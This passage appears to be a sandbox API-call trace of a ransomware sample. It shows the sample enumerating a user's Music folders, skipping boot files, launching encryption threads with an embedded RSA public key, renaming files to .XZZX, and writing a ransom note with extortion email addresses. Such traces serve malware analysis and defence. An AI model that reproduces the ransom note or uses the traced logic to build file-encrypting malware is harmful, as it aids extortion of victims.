lpString2="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" | out: lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" [0244.957] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.957] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1304 [0244.957] Sleep (dwMilliseconds=0x96) [0245.112] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0245.112] lstrcmpW (lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpString2="..") returned 1 [0245.112] lstrcmpW (lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpString2=".") returned 1 [0245.112] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0245.113] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="ntldr") returned 0x0 [0245.113] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="NTLDR") returned 0x0 [0245.113] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0245.113] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0245.113] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0245.113] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0245.113] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0245.113] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.113] lstrcpyW (in: lpString1=0x17addc, lpString2="BA853E823C01028A03C2DABB4021E6D2.XZZX" | out: lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX") returned="BA853E823C01028A03C2DABB4021E6D2.XZZX" [0245.113] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.113] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1308 [0245.113] Sleep (dwMilliseconds=0x96) [0245.269] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0245.269] lstrcmpW (lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpString2="..") returned 1 [0245.269] lstrcmpW (lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpString2=".") returned 1 [0245.269] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0245.269] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="ntldr") returned 0x0 [0245.269] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="NTLDR") returned 0x0 [0245.269] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0245.269] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="ntdetect.com") returned 0x0 [0245.269] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0245.269] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0245.269] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0245.269] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.269] lstrcpyW (in: lpString1=0x17addc, lpString2="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" | out: lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" [0245.269] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130c [0245.269] Sleep (dwMilliseconds=0x96) [0245.424] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0245.424] lstrcmpW (lpString1="D02310330D7F24F9EA0895E311A00941.XZZX", lpString2="..") returned 1 [0245.424] lstrcmpW (lpString1="D02310330D7F24F9EA0895E311A00941.XZZX", lpString2=".") returned 1 [0245.424] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0245.424] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="ntldr") returned 0x0 [0245.424] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="NTLDR") returned 0x0 [0245.425] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0245.425] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="ntdetect.com") returned 0x0 [0245.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0245.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0245.425] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0245.425] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.425] lstrcpyW (in: lpString1=0x17addc, lpString2="D02310330D7F24F9EA0895E311A00941.XZZX" | out: lpString1="D02310330D7F24F9EA0895E311A00941.XZZX") returned="D02310330D7F24F9EA0895E311A00941.XZZX" [0245.425] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.425] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1310 [0245.425] Sleep (dwMilliseconds=0x96) [0245.580] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0245.580] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0245.581] lstrcmpW (lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpString2="..") returned 1 [0245.581] lstrcmpW (lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpString2=".") returned 1 [0245.581] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0245.581] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="ntldr") returned 0x0 [0245.581] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="NTLDR") returned 0x0 [0245.581] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0245.581] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="ntdetect.com") returned 0x0 [0245.581] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0245.581] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0245.581] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0245.581] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.581] lstrcpyW (in: lpString1=0x17addc, lpString2="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" | out: lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" [0245.581] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1314 [0245.581] Sleep (dwMilliseconds=0x96) [0245.736] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0245.736] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0245.737] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0245.737] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0245.737] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0245.737] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 1 [0245.737] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 0 [0245.737] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0245.737] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*" [0245.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0245.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0245.737] SetErrorMode (uMode=0x1) returned 0x1 [0245.737] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_HELP_INSTRUCTION.TXT") returned 90 [0245.737] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0245.737] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0245.737] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x1318) returned 0x0 [0245.737] RegQueryValueExW (in: hKey=0x1318, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dcea0, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43dcea0*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0245.737] RegCloseKey (hKey=0x1318) returned 0x0 [0245.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0245.737] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0245.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1318 [0245.738] CloseHandle (hObject=0x1318) returned 1 [0245.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0245.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0245.738] lstrcpyW (in: lpString1=0x17a5a4, lpString2="9Y_m-oVB2IyYX" | out: lpString1="9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0245.738] lstrcpyW (in: lpString1=0x17b430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0245.738] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.738] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpString2="DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0245.738] SetErrorMode (uMode=0x1) returned 0x1 [0245.738] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0245.738] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0245.738] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0245.738] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*" [0245.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3cded18 [0245.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="DqOPM" [0245.738] lstrcpyW (in: lpString1=0x179504, lpString2="DqOPM" | out: lpString1="DqOPM") returned="DqOPM" [0245.738] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0245.738] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="ntldr") returned 0x0 [0245.738] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="NTLDR") returned 0x0 [0245.738] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0245.738] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0245.738] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0245.738] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0245.738] wsprintfW (in: 